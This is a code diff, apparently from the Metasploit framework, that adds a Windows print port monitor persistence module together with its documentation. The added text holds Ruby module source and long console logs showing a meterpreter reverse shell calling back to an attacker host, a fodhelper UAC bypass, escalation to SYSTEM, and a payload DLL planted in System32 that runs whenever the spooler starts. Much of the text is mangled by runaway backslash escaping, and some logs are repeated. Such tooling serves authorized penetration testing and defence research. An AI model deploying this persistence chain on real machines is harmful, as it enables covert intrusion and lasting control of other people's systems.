-\\\\\\\[+] The target is vulnerable. Can write to monitor registry path and System32
-msf exploit(windows/persistence/port\\\\\\\_monitor) > run
-\\\\\\\[\\\\\\\*] Exploit running as background job 0.
-\\\\\\\[\\\\\\\*] Exploit completed, but no session was created.
-msf exploit(windows/persistence/port\\\\\\\_monitor) >
-\\\\\\\[-] Handler failed to bind to 172.21.176.212:4444:-  -
-\\\\\\\[-] Handler failed to bind to 0.0.0.0:4444:-  -
-\\\\\\\[\\\\\\\*] Running automatic check ("set AutoCheck false" to disable)
-\\\\\\\[+] The target is vulnerable. Can write to monitor registry path and System32
-\\\\\\\[\\\\\\\*] Writing payload DLL to C:\\\\\\\\WINDOWS\\\\\\\\System32\\\\\\\\persist.dll
-\\\\\\\[\\\\\\\*] Setting print monitor Driver value to persist.dll (C:\\\\\\\\WINDOWS\\\\\\\\System32\\\\\\\\persist.dll)
-\\\\\\\[+] Persistence established. Registry: HKLM\\\\\\\\SYSTEM\\\\\\\\CurrentControlSet\\\\\\\\Control\\\\\\\\Print\\\\\\\\Monitors\\\\\\\\Hadess\\\\\\\\Driver -> persist.dll
-\\\\\\\[\\\\\\\*] Payload should execute when the Print Spooler service starts (typically at boot).
-\\\\\\\[\\\\\\\*] Meterpreter-compatible Cleanup RC file: /home/nayera/.msf4/logs/persistence/NERO\\\\\\\_20260318.0548/NERO\\\\\\\_20260318.0548.rc
+msf exploit(windows/persistence/port_monitor) > check
+[+] The target is vulnerable. Can write to monitor registry path and System32
+msf exploit(windows/persistence/port_monitor) > run
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+msf exploit(windows/persistence/port_monitor) >
+[-] Handler failed to bind to 172.21.176.212:4444:-  -
+[-] Handler failed to bind to 0.0.0.0:4444:-  -
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Can write to monitor registry path and System32
+[*] Writing payload DLL to C:\WINDOWS\System32\persist.dll
+[*] Setting print monitor Driver value to persist.dll (C:\WINDOWS\System32\persist.dll)
+[+] Persistence established. Registry: HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors\Hadess\Driver -> persist.dll
+[*] Payload should execute when the Print Spooler service starts (typically at boot).
+[*] Meterpreter-compatible Cleanup RC file: /home/nayera/.msf4/logs/persistence/NERO_20260318.0548/NERO_20260318.0548.rc
 
-msf exploit(windows/persistence/port\\\\\\\_monitor) >
+msf exploit(windows/persistence/port_monitor) >
 
 msf exploit(multi/handler) > sessions -i 3
-\\\\\\\[\\\\\\\*] Starting interaction with 3...
+[*] Starting interaction with 3...
 
 meterpreter > shell
 Process 18120 created.
 Channel 6 created.
-Microsoft Windows \\\\\\\[Version 10.0.26200.8037]
+Microsoft Windows [Version 10.0.26200.8037]
 (c) Microsoft Corporation. All rights reserved.
 
-C:\\\\\\\\Windows\\\\\\\\System32>net stop spooler
+C:\Windows\System32>net stop spooler
 net start spooler
 net stop spooler
 The Print Spooler service is stopping.
@@ -292,21 +303,21 @@ The Print Spooler service is stopping.
 The Print Spooler service was stopped successfully.
 
 
-C:\\\\\\\\Windows\\\\\\\\System32>net start spooler
+C:\Windows\System32>net start spooler
 The Print Spooler service is starting.
 The Print Spooler service was started successfully.
 
 
 
-C:\\\\\\\\Windows\\\\\\\\System32>reg query HKLM\\\\\\\\SYSTEM\\\\\\\\CurrentControlSet\\\\\\\\Control\\\\\\\\Print\\\\\\\\Monitors\\\\\\\\Hadess
+C:\Windows\System32>reg query HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors\Hadess
 
-reg query HKLM\\\\\\\\SYSTEM\\\\\\\\CurrentControlSet\\\\\\\\Control\\\\\\\\Print\\\\\\\\Monitors\\\\\\\\Hadess
+reg query HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors\Hadess
 
 
 
-HKEY\\\\\\\_LOCAL\\\\\\\_MACHINE\\\\\\\\SYSTEM\\\\\\\\CurrentControlSet\\\\\\\\Control\\\\\\\\Print\\\\\\\\Monitors\\\\\\\\Hadess
+HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Monitors\Hadess
 
-\\\&#x20;   Driver    REG\\\\\\\_SZ    persist.dll
+&#x20;   Driver    REG_SZ    persist.dll
 
 ```
 

--- a/documentation/modules/exploit/windows/persistence/port_monitor.md
+++ b/documentation/modules/exploit/windows/persistence/port_monitor.md
@@ -1,0 +1,312 @@
+## Vulnerable Application
+
+### Windows Print Spooler (Port Monitor Persistence)
+
+The Windows Print Spooler service supports loading custom **Print Monitor DLLs**, which are registered under:
+
+`HKLM\\\\\\\\SYSTEM\\\\\\\\CurrentControlSet\\\\\\\\Control\\\\\\\\Print\\\\\\\\Monitors`
+
+At system startup (or when the Spooler service restarts), Windows automatically loads all configured monitor DLLs.
+This behavior can be abused to achieve **persistence**,
+as any malicious DLL placed and registered in this location will be executed by the Spooler service.
+
+This module leverages the **manual registry method** (instead of the `AddMonitor` API) by:
+
+* Writing a malicious DLL to `%WINDIR%\\\\\\\\System32`
+* Creating or modifying a monitor registry key
+* Setting the `Driver` value to point to the payload DLL
+
+
+
+Since this requires writing to **System32** and modifying **HKLM**, **administrative or SYSTEM privileges are required**.
+
+This technique is mapped to:
+
+* MITRE ATT\&CK T1547.010 (Port Monitors)
+* MITRE ATT\&CK T1112 (Modify Registry)
+
+
+
+## Verification Steps
+
+1. Start `msfconsole`
+2. Get a SYSTEM session
+3. use exploit/windows/persistence/port\_monitor
+4. set SESSION
+5. check
+6. run
+7. sessions -i
+8. shell
+9. net stop spooler
+10. net stop spooler
+11. reg query HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors<monitor\_name>
+
+
+
+## Options
+
+### SESSION (Required)
+
+The session to run this module on.
+
+### LHOST (Required)
+
+The local host to receive the reverse connection.
+
+### LPORT (Required)
+
+The local port to receive the reverse connection.
+
+### MONITOR\_NAME
+
+Name of the registry key created under:
+
+HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors
+
+### DLL\_NAME
+
+Name of the payload DLL written to: %WINDIR%\\System32
+
+### RESTART\_SPOOLER
+
+Restart the Print Spooler service after installation to trigger the payload immediately.
+
+
+
+## Scenarios
+
+### Initial System Session
+
+```msf exploit(windows/persistence/port\\\\\\\_monitor) > use exploit/multi/handler
+\\\\\\\[\\\\\\\*] Using configured payload generic/shell\\\\\\\_reverse\\\\\\\_tcp
+msf exploit(multi/handler) > windows/x64/meterpreter/reverse\\\\\\\_https
+\\\\\\\[-] Unknown command: windows/x64/meterpreter/reverse\\\\\\\_https. Run the help command for more details.
+This is a module we can load. Do you want to use windows/x64/meterpreter/reverse\\\\\\\_https? \\\\\\\[y/N]   exit
+msf exploit(multi/handler) > set payload windows/x64/meterpreter/reverse\\\\\\\_https
+payload => windows/x64/meterpreter/reverse\\\\\\\_https
+msf exploit(multi/handler) > set LHOST 172.21.176.212
+LHOST => 172.21.176.212
+msf exploit(multi/handler) > set LPORT 4444
+LPORT => 4444
+msf exploit(multi/handler) > run
+\\\\\\\[\\\\\\\*] Started HTTPS reverse handler on https://172.21.176.212:4444
+\\\\\\\[!] https://172.21.176.212:4444 handling request from 172.21.176.1; (UUID: abgnhr2o) Without a database connected that payload UUID tracking will not work!
+\\\\\\\[\\\\\\\*] https://172.21.176.212:4444 handling request from 172.21.176.1; (UUID: abgnhr2o) Staging x64 payload (233052 bytes) ...
+\\\\\\\[!] https://172.21.176.212:4444 handling request from 172.21.176.1; (UUID: abgnhr2o) Without a database connected that payload UUID tracking will not work!
+\\\\\\\[\\\\\\\*] Meterpreter session 1 opened (172.21.176.212:4444 -> 172.21.176.1:59514) at 2026-03-11 01:49:18 +0200
+
+meterpreter > background
+\\\\\\\[\\\\\\\*] Backgrounding session 1...
+
+msf exploit(multi/handler) > use post/multi/recon/local\\\\\\\_exploit\\\\\\\_suggester
+msf post(multi/recon/local\\\\\\\_exploit\\\\\\\_suggester) > set SESSION 1
+SESSION => 1
+msf post(multi/recon/local\\\\\\\_exploit\\\\\\\_suggester) > run
+\\\\\\\[\\\\\\\*] 172.21.176.1 - Collecting local exploits for x64/windows...
+\\\\\\\[\\\\\\\*] 172.21.176.1 - 243 exploit checks are being tried...
+\\\\\\\[+] 172.21.176.1 - exploit/windows/local/bypassuac\\\\\\\_dotnet\\\\\\\_profiler: The target appears to be vulnerable.
+\\\\\\\[+] 172.21.176.1 - exploit/windows/local/bypassuac\\\\\\\_fodhelper: The target appears to be vulnerable.
+\\\\\\\[+] 172.21.176.1 - exploit/windows/local/bypassuac\\\\\\\_sdclt: The target appears to be vulnerable.
+\\\\\\\[+] 172.21.176.1 - exploit/windows/persistence/registry: The target is vulnerable. Registry writable
+\\\\\\\[+] 172.21.176.1 - exploit/windows/persistence/registry\\\\\\\_userinit: The target is vulnerable. Registry likely exploitable
+\\\\\\\[+] 172.21.176.1 - exploit/windows/persistence/startup\\\\\\\_folder: The target appears to be vulnerable. Likely exploitable, able to write test file to C:\\\\\\\\Users\\\\\\\\DELL\\\\\\\\AppData\\\\\\\\Roaming\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\Start Menu\\\\\\\\Programs\\\\\\\\Startup
+\\\\\\\[\\\\\\\*] Running check method for exploit 63 / 63
+\\\\\\\[\\\\\\\*] 172.21.176.1 - Valid modules for session 1:
+============================
+
+ #   Name                                                              Potentially Vulnerable?  Check Result
+ -   ----                                                              -----------------------  ------------
+ 1   exploit/windows/local/bypassuac\\\\\\\_dotnet\\\\\\\_profiler                   Yes                      The target appears to be vulnerable.
+ 2   exploit/windows/local/bypassuac\\\\\\\_fodhelper                         Yes                      The target appears to be vulnerable.
+ 3   exploit/windows/local/bypassuac\\\\\\\_sdclt                             Yes                      The target appears to be vulnerable.
+ 4   exploit/windows/persistence/registry                              Yes                      The target is vulnerable. Registry writable
+ 5   exploit/windows/persistence/registry\\\\\\\_userinit                     Yes                      The target is vulnerable. Registry likely exploitable
+ 6   exploit/windows/persistence/startup\\\\\\\_folder                        Yes                      The target appears to be vulnerable. Likely exploitable, able to write test file to C:\\\\\\\\Users\\\\\\\\DELL\\\\\\\\AppData\\\\\\\\Roaming\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\Start Menu\\\\\\\\Programs\\\\\\\\Startup
+ 7   exploit/multi/persistence/ssh\\\\\\\_key                                 No                       The target is not exploitable. sshd\\\\\\\_config file not found
+ 8   exploit/windows/local/agnitum\\\\\\\_outpost\\\\\\\_acs                         No                       The target is not exploitable.
+ 9   exploit/windows/local/always\\\\\\\_install\\\\\\\_elevated                     No                       The target is not exploitable.
+ 10  exploit/windows/local/bits\\\\\\\_ntlm\\\\\\\_token\\\\\\\_impersonation               No                       The target is not exploitable.
+ 11  exploit/windows/local/bypassuac\\\\\\\_comhijack                         No                       The target is not exploitable.
+ 12  exploit/windows/local/bypassuac\\\\\\\_eventvwr                          No                       The target is not exploitable.
+ 13  exploit/windows/local/bypassuac\\\\\\\_sluihijack                        No                       The target is not exploitable.
+ 14  exploit/windows/local/canon\\\\\\\_driver\\\\\\\_privesc                        No                       The target is not exploitable. No Canon TR150 driver directory found
+ 15  exploit/windows/local/capcom\\\\\\\_sys\\\\\\\_exec                             No                       The target is not exploitable. Target contains a block list which prevents the vulnerable driver from being loaded!
+ 16  exploit/windows/local/cve\\\\\\\_2019\\\\\\\_1458\\\\\\\_wizardopium                   No                       The target is not exploitable.
+ 17  exploit/windows/local/cve\\\\\\\_2020\\\\\\\_0787\\\\\\\_bits\\\\\\\_arbitrary\\\\\\\_file\\\\\\\_move      No                       The target is not exploitable. Target is not running a vulnerable version of Windows!
+ 18  exploit/windows/local/cve\\\\\\\_2020\\\\\\\_0796\\\\\\\_smbghost                      No                       The target is not exploitable.
+ 19  exploit/windows/local/cve\\\\\\\_2020\\\\\\\_1048\\\\\\\_printerdemon                  No                       The target is not exploitable.
+ 20  exploit/windows/local/cve\\\\\\\_2020\\\\\\\_1054\\\\\\\_drawiconex\\\\\\\_lpe                No                       The target is not exploitable. No target for win32k.sys version 6.2.26100.7705
+ 21  exploit/windows/local/cve\\\\\\\_2020\\\\\\\_1313\\\\\\\_system\\\\\\\_orchestrator           No                       The target is not exploitable.
+ 22  exploit/windows/local/cve\\\\\\\_2020\\\\\\\_1337\\\\\\\_printerdemon                  No                       The target is not exploitable.
+ 23  exploit/windows/local/cve\\\\\\\_2020\\\\\\\_17136                              No                       The target is not exploitable. The build number of the target machine does not appear to be a vulnerable version!
+ 24  exploit/windows/local/cve\\\\\\\_2021\\\\\\\_21551\\\\\\\_dbutil\\\\\\\_memmove               No                       The target is not exploitable.
+ 25  exploit/windows/local/cve\\\\\\\_2021\\\\\\\_40449                              No                       The target is not exploitable. Target is not running a vulnerable version of Windows!
+ 26  exploit/windows/local/cve\\\\\\\_2022\\\\\\\_21882\\\\\\\_win32k                       No                       The target is not exploitable.
+ 27  exploit/windows/local/cve\\\\\\\_2022\\\\\\\_21999\\\\\\\_spoolfool\\\\\\\_privesc            No                       The target is not exploitable.
+ 28  exploit/windows/local/cve\\\\\\\_2022\\\\\\\_3699\\\\\\\_lenovo\\\\\\\_diagnostics\\\\\\\_driver     No                       The target is not exploitable.
+ 29  exploit/windows/local/cve\\\\\\\_2023\\\\\\\_21768\\\\\\\_afd\\\\\\\_lpe                      No                       The target is not exploitable. The exploit only supports Windows 11 22H2
+ 30  exploit/windows/local/cve\\\\\\\_2023\\\\\\\_28252\\\\\\\_clfs\\\\\\\_driver                  No                       The target is not exploitable.
+ 31  exploit/windows/local/cve\\\\\\\_2024\\\\\\\_30085\\\\\\\_cloud\\\\\\\_files                  No                       The target is not exploitable.
+ 32  exploit/windows/local/cve\\\\\\\_2024\\\\\\\_30088\\\\\\\_authz\\\\\\\_basep                  No                       The target is not exploitable. Version detected: Windows 10+ Build 26200. Revision number detected: 7840.
+ 33  exploit/windows/local/cve\\\\\\\_2024\\\\\\\_35250\\\\\\\_ks\\\\\\\_driver                    No                       The target is not exploitable. Version detected: Windows 10+ Build 26200
+ 34  exploit/windows/local/gog\\\\\\\_galaxyclientservice\\\\\\\_privesc             No                       The target is not exploitable. Galaxy Client Service not found
+ 35  exploit/windows/local/ikeext\\\\\\\_service                              No                       The check raised an exception.
+ 36  exploit/windows/local/lexmark\\\\\\\_driver\\\\\\\_privesc                      No                       The target is not exploitable. No Lexmark print drivers in the driver store
+ 37  exploit/windows/local/ms10\\\\\\\_092\\\\\\\_schelevator                        No                       The target is not exploitable. Windows 11 24H2+ (10.0 Build 26200). is not vulnerable
+ 38  exploit/windows/local/ms14\\\\\\\_058\\\\\\\_track\\\\\\\_popup\\\\\\\_menu                   No                       Cannot reliably check exploitability.
+ 39  exploit/windows/local/ms15\\\\\\\_051\\\\\\\_client\\\\\\\_copy\\\\\\\_image                  No                       The target is not exploitable.
+ 40  exploit/windows/local/ms15\\\\\\\_078\\\\\\\_atmfd\\\\\\\_bof                          No                       The target is not exploitable.
+ 41  exploit/windows/local/ms16\\\\\\\_014\\\\\\\_wmi\\\\\\\_recv\\\\\\\_notif                     No                       The target is not exploitable.
+ 42  exploit/windows/local/ms16\\\\\\\_032\\\\\\\_secondary\\\\\\\_logon\\\\\\\_handle\\\\\\\_privesc     No                       The check raised an exception.
+ 43  exploit/windows/local/ms16\\\\\\\_075\\\\\\\_reflection                         No                       The target is not exploitable.
+ 44  exploit/windows/local/ms16\\\\\\\_075\\\\\\\_reflection\\\\\\\_juicy                   No                       The target is not exploitable.
+ 45  exploit/windows/local/ntapphelpcachecontrol                       No                       The check raised an exception.
+ 46  exploit/windows/local/nvidia\\\\\\\_nvsvc                                No                       The check raised an exception.
+ 47  exploit/windows/local/panda\\\\\\\_psevents                              No                       The target is not exploitable.
+ 48  exploit/windows/local/ricoh\\\\\\\_driver\\\\\\\_privesc                        No                       The target is not exploitable. No Ricoh driver directory found
+ 49  exploit/windows/local/srclient\\\\\\\_dll\\\\\\\_hijacking                      No                       The target is not exploitable. Target is not Windows Server 2012.
+ 50  exploit/windows/local/tokenmagic                                  No                       The target is not exploitable.
+ 51  exploit/windows/local/virtual\\\\\\\_box\\\\\\\_opengl\\\\\\\_escape                   No                       The target is not exploitable.
+ 52  exploit/windows/local/webexec                                     No                       The check raised an exception.
+ 53  exploit/windows/local/win\\\\\\\_error\\\\\\\_cve\\\\\\\_2023\\\\\\\_36874                    No                       The target is not exploitable.
+ 54  exploit/windows/persistence/accessibility\\\\\\\_features\\\\\\\_debugger       No                       The target is not exploitable. You have admin rights to run this Module
+ 55  exploit/windows/persistence/assistive\\\\\\\_technology                  No                       The target is not exploitable. You have admin rights to run this Module
+ 56  exploit/windows/persistence/notepadpp\\\\\\\_plugin                      No                       The target is not exploitable. Notepad++ is probably not present
+ 57  exploit/windows/persistence/port\\\\\\\_monitor                          No                       The target is not exploitable. Admin or SYSTEM privileges are required
+ 58  exploit/windows/persistence/service                               No                       The target is not exploitable. You must be System/Admin to run this Module
+ 59  exploit/windows/persistence/task\\\\\\\_scheduler                        No                       The target is not exploitable. You need higher privileges to create scheduled tasks
+ 60  exploit/windows/persistence/wmi/wmi\\\\\\\_event\\\\\\\_subscription\\\\\\\_event\\\\\\\_log  No                       The target is not exploitable. This module requires powershell to run
+ 61  exploit/windows/persistence/wmi/wmi\\\\\\\_event\\\\\\\_subscription\\\\\\\_interval   No                       The target is not exploitable. This module requires powershell to run
+ 62  exploit/windows/persistence/wmi/wmi\\\\\\\_event\\\\\\\_subscription\\\\\\\_process    No                       The target is not exploitable. This module requires powershell to run
+ 63  exploit/windows/persistence/wmi/wmi\\\\\\\_event\\\\\\\_subscription\\\\\\\_uptime     No                       The target is not exploitable. This module requires powershell to run
+
+\\\\\\\[\\\\\\\*] Post module execution completed
+msf post(multi/recon/local\\\\\\\_exploit\\\\\\\_suggester) > use exploit/windows/local/bypassuac\\\\\\\_fodhelper
+\\\\\\\[\\\\\\\*] No payload configured, defaulting to windows/meterpreter/reverse\\\\\\\_tcp
+msf exploit(windows/local/bypassuac\\\\\\\_fodhelper) > set SESSION 1
+SESSION => 1
+msf exploit(windows/local/bypassuac\\\\\\\_fodhelper) > set LHOST 172.21.176.212
+LHOST => 172.21.176.212
+msf exploit(windows/local/bypassuac\\\\\\\_fodhelper) > set LPORT 5555
+LPORT => 5555
+msf exploit(windows/local/bypassuac\\\\\\\_fodhelper) > run
+\\\\\\\[\\\\\\\*] Started reverse TCP handler on 172.21.176.212:5555 
+\\\\\\\[\\\\\\\*] UAC is Enabled, checking level...
+\\\\\\\[+] Part of Administrators group! Continuing...
+\\\\\\\[+] UAC is set to Default
+\\\\\\\[+] BypassUAC can bypass this setting, continuing...
+\\\\\\\[\\\\\\\*] Configuring payload and stager registry keys ...
+\\\\\\\[\\\\\\\*] Executing payload: C:\\\\\\\\WINDOWS\\\\\\\\system32\\\\\\\\cmd.exe /c C:\\\\\\\\WINDOWS\\\\\\\\System32\\\\\\\\fodhelper.exe
+\\\\\\\[\\\\\\\*] Sending stage (190534 bytes) to 172.21.176.1
+\\\\\\\[\\\\\\\*] Cleaning up registry keys ...
+\\\\\\\[\\\\\\\*] Meterpreter session 2 opened (172.21.176.212:5555 -> 172.21.176.1:53775) at 2026-03-11 02:13:39 +0200
+
+meterpreter > getuid
+Server username: NERO\\\\\\\\DELL
+meterpreter > getsystem
+...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
+meterpreter > getuid
+Server username: NT AUTHORITY\\\\\\\\SYSTEM
+meterpreter > background
+\\\\\\\[\\\\\\\*] Backgrounding session 2...
+
+```
+
+
+
+### Install Persistence
+
+```msf exploit(windows/local/bypassuac\\\\\\\_fodhelper) > use exploit/windows/persistence/port\\\\\\\_monitor
+\\\\\\\[\\\\\\\*] Using configured payload windows/meterpreter/reverse\\\\\\\_tcp
+msf exploit(windows/persistence/port\\\\\\\_monitor) > set SESSION 2
+SESSION => 2
+msf exploit(windows/persistence/port\\\\\\\_monitor) > show options
+
+Module options (exploit/windows/persistence/port\\\\\\\_monitor):
+
+   Name             Current Setting  Required  Description
+   ----             ---------------  --------  -----------
+   DLL\\\\\\\_NAME         persist.dll      no        DLL filename to write in %WINDIR%\\\\\\\\S
+                                               ystem32.
+   MONITOR\\\\\\\_NAME     Hadess           no        Name of the print monitor registry
+                                               key to create.
+   RESTART\\\\\\\_SPOOLER  false            yes       Restart the Print Spooler service t
+                                               o trigger monitor loading immediate
+                                               ly.
+   SESSION          2                yes       The session to run this module on
+
+
+Payload options (windows/meterpreter/reverse\\\\\\\_tcp):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread,
+                                         process, none)
+   LHOST     172.21.176.212   yes       The listen address (an interface may be sp
+                                        ecified)
+   LPORT     4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Automatic
+
+
+
+View the full module info with the info, or info -d command.
+
+msf exploit(windows/persistence/port\\\\\\\_monitor) > check
+\\\\\\\[+] The target is vulnerable. Can write to monitor registry path and System32
+msf exploit(windows/persistence/port\\\\\\\_monitor) > run
+\\\\\\\[\\\\\\\*] Exploit running as background job 0.
+\\\\\\\[\\\\\\\*] Exploit completed, but no session was created.
+msf exploit(windows/persistence/port\\\\\\\_monitor) >
+\\\\\\\[-] Handler failed to bind to 172.21.176.212:4444:-  -
+\\\\\\\[-] Handler failed to bind to 0.0.0.0:4444:-  -
+\\\\\\\[\\\\\\\*] Running automatic check ("set AutoCheck false" to disable)
+\\\\\\\[+] The target is vulnerable. Can write to monitor registry path and System32
+\\\\\\\[\\\\\\\*] Writing payload DLL to C:\\\\\\\\WINDOWS\\\\\\\\System32\\\\\\\\persist.dll
+\\\\\\\[\\\\\\\*] Setting print monitor Driver value to persist.dll (C:\\\\\\\\WINDOWS\\\\\\\\System32\\\\\\\\persist.dll)
+\\\\\\\[+] Persistence established. Registry: HKLM\\\\\\\\SYSTEM\\\\\\\\CurrentControlSet\\\\\\\\Control\\\\\\\\Print\\\\\\\\Monitors\\\\\\\\Hadess\\\\\\\\Driver -> persist.dll
+\\\\\\\[\\\\\\\*] Payload should execute when the Print Spooler service starts (typically at boot).
+\\\\\\\[\\\\\\\*] Meterpreter-compatible Cleanup RC file: /home/nayera/.msf4/logs/persistence/NERO\\\\\\\_20260318.0548/NERO\\\\\\\_20260318.0548.rc
+
+msf exploit(windows/persistence/port\\\\\\\_monitor) >
+
+msf exploit(multi/handler) > sessions -i 3
+\\\\\\\[\\\\\\\*] Starting interaction with 3...
+
+meterpreter > shell
+Process 18120 created.
+Channel 6 created.
+Microsoft Windows \\\\\\\[Version 10.0.26200.8037]
+(c) Microsoft Corporation. All rights reserved.
+
+C:\\\\\\\\Windows\\\\\\\\System32>net stop spooler
+net start spooler
+net stop spooler
+The Print Spooler service is stopping.
+
+The Print Spooler service was stopped successfully.
+
+
+C:\\\\\\\\Windows\\\\\\\\System32>net start spooler
+The Print Spooler service is starting.
+The Print Spooler service was started successfully.
+
+
+
+C:\\\\\\\\Windows\\\\\\\\System32>reg query HKLM\\\\\\\\SYSTEM\\\\\\\\CurrentControlSet\\\\\\\\Control\\\\\\\\Print\\\\\\\\Monitors\\\\\\\\Hadess
+
+reg query HKLM\\\\\\\\SYSTEM\\\\\\\\CurrentControlSet\\\\\\\\Control\\\\\\\\Print\\\\\\\\Monitors\\\\\\\\Hadess
+
+
+
+HKEY\\\\\\\_LOCAL\\\\\\\_MACHINE\\\\\\\\SYSTEM\\\\\\\\CurrentControlSet\\\\\\\\Control\\\\\\\\Print\\\\\\\\Monitors\\\\\\\\Hadess
+
+\\\&#x20;   Driver    REG\\\\\\\_SZ    persist.dll
+
+```
+

--- a/documentation/modules/exploit/windows/persistence/port_monitor.md
+++ b/documentation/modules/exploit/windows/persistence/port_monitor.md
@@ -31,15 +31,15 @@ This technique is mapped to:
 
 1. Start `msfconsole`
 2. Get a SYSTEM session
-3. use exploit/windows/persistence/port\_monitor
-4. set SESSION
-5. check
-6. run
-7. sessions -i
-8. shell
-9. net stop spooler
-10. net stop spooler
-11. reg query HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors<monitor\_name>
+3. `use exploit/windows/persistence/port\_monitor`
+4. `set SESSION <id>`
+5. `check`
+6. `run`
+7. `sessions -i <id>`
+8. `shell`
+9. `net stop spooler`
+10. `net stop spooler`
+11. `reg query HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors<monitor\_name>`
 
 
 

--- a/modules/exploits/windows/persistence/port_monitor.rb
+++ b/modules/exploits/windows/persistence/port_monitor.rb
@@ -1,0 +1,156 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Post::File
+  include Msf::Exploit::EXE
+  include Msf::Exploit::Local::Persistence
+  include Msf::Post::Windows::Priv
+  include Msf::Post::Windows::Registry
+  include Msf::Post::Windows::Services
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Windows Print Port Monitor Persistence',
+        'Description' => %q{
+          This module establishes persistence by registering a malicious Print Monitor DLL
+          under HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors. The Print Spooler
+          service loads configured monitor DLLs at startup, causing payload execution when
+          the spooler service starts (for example, on boot).
+
+          This module implements the manual registry method (not the AddMonitor API method).
+          It writes the payload DLL to %WINDIR%\System32 and requires administrative
+          privileges to write to System32 and modify HKLM.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => ['Nayera'],
+        'Arch' => [ARCH_X64, ARCH_X86, ARCH_AARCH64],
+        'Platform' => [ 'win' ],
+        'SessionTypes' => [ 'meterpreter', 'shell' ],
+        'Privileged' => true,
+        'Targets' => [
+          [ 'Automatic', {} ]
+        ],
+        'DisclosureDate' => '2026-03-10',
+        'DefaultTarget' => 0,
+        'References' => [
+          ['ATT&CK', Mitre::Attack::Technique::T1547_010_PORT_MONITORS],
+          ['ATT&CK', Mitre::Attack::Technique::T1112_MODIFY_REGISTRY],
+          ['URL', 'https://learn.microsoft.com/en-us/windows-hardware/drivers/print/adding-a-port-monitor'],
+          ['URL', 'https://learn.microsoft.com/en-us/windows/win32/printdocs/print-monitors']
+        ],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION, EVENT_DEPENDENT],
+          'SideEffects' => [ARTIFACTS_ON_DISK, CONFIG_CHANGES]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('MONITOR_NAME', [false, 'Name of the print monitor registry key to create.', 'Hadess']),
+        OptString.new('DLL_NAME', [false, 'DLL filename to write in %WINDIR%\\System32.', 'persist.dll']),
+        OptBool.new('RESTART_SPOOLER', [true, 'Restart the Print Spooler service to trigger monitor loading immediately.', false])
+      ]
+    )
+  end
+
+  def monitor_reg_key
+    "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors\\#{datastore['MONITOR_NAME']}"
+  end
+
+  def system32_path
+    expand_path('%WINDIR%\\System32')
+  end
+
+  def payload_name
+    datastore['DLL_NAME']
+  end
+
+  def payload_path
+    "#{system32_path}\\#{payload_name}"
+  end
+
+  def check
+    return CheckCode::Safe('Admin or SYSTEM privileges are required') unless is_admin? || is_system?
+    return CheckCode::Safe("System32 path does not exist: #{system32_path}") unless directory?(system32_path)
+
+    test_file = "#{system32_path}\\#{Rex::Text.rand_text_alpha(6)}.tmp"
+
+    begin
+      write_file(test_file, 'test')
+      rm_f(test_file)
+    rescue StandardError
+      return CheckCode::Safe("Unable to write to #{system32_path}")
+    end
+    test_key = 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors\\' + Rex::Text.rand_text_alpha(8)
+    return CheckCode::Safe('Unable to create temporary monitor registry key under HKLM') unless registry_createkey(test_key)
+
+    registry_deletekey(test_key)
+    CheckCode::Vulnerable('Can write to monitor registry path and System32')
+  end
+
+  def install_persistence
+    fail_with(Failure::NoAccess, 'Admin or SYSTEM privileges are required') unless is_admin? || is_system?
+
+    fail_with(Failure::BadConfig, 'DLL_NAME must end in .dll') unless payload_name.downcase.end_with?('.dll')
+    fail_with(Failure::BadConfig, 'DLL_NAME must not contain path separators') if payload_name.match?(%r{[\\/]})
+    fail_with(Failure::BadConfig, 'MONITOR_NAME cannot be empty') if datastore['MONITOR_NAME'].strip.empty?
+
+    payload_dll = generate_payload_dll(dll_exitprocess: true)
+    fail_with(Failure::BadConfig, "#{payload_instance.arch.first} payload selected for #{sysinfo['Architecture']} system") unless sysinfo['Architecture'] == payload_instance.arch.first
+
+    print_status("Writing payload DLL to #{payload_path}")
+    write_file(payload_path, payload_dll)
+    fail_with(Failure::UnexpectedReply, "Failed to write payload DLL to #{payload_path}") unless exists?(payload_path)
+
+    @existing_monitor_key = !registry_enumkeys(monitor_reg_key).nil?
+    unless @existing_monitor_key || registry_createkey(monitor_reg_key)
+      fail_with(Failure::UnexpectedReply, "Failed to create monitor key: #{monitor_reg_key}")
+    end
+
+    @original_driver = registry_getvaldata(monitor_reg_key, 'Driver') if @existing_monitor_key
+
+    print_status("Setting print monitor Driver value to #{payload_name} (#{payload_path})")
+    unless registry_setvaldata(monitor_reg_key, 'Driver', payload_name, 'REG_SZ')
+      fail_with(Failure::UnexpectedReply, "Failed to write registry value: #{monitor_reg_key}\\Driver")
+    end
+
+    print_good("Persistence established. Registry: #{monitor_reg_key}\\Driver -> #{payload_name}")
+    print_status('Payload should execute when the Print Spooler service starts (typically at boot).')
+
+    restart_spooler if datastore['RESTART_SPOOLER']
+
